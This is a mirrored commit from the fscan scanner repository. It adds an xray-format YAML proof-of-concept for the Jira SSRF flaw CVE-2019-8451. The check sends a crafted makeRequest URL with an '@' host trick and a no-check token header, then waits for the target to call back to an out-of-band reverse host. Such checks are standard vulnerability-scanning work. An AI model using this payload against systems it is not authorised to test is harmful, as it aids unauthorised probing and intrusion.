mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,19 @@
|
||||
name: poc-yaml-jira-ssrf-cve-2019-8451
|
||||
set:
|
||||
originScheme: request.url.scheme
|
||||
originHost: request.url.host
|
||||
reverse: newReverse()
|
||||
reverseHost: reverse.url.host
|
||||
reverseURL: reverse.url.path
|
||||
rules:
|
||||
- method: GET
|
||||
path: >-
|
||||
/plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
|
||||
headers:
|
||||
X-Atlassian-Token: no-check
|
||||
expression: |
|
||||
reverse.wait(5)
|
||||
detail:
|
||||
author: jingling(https://github.com/shmilylty)
|
||||
links:
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69793
|
||||
Reference in New Issue
Block a user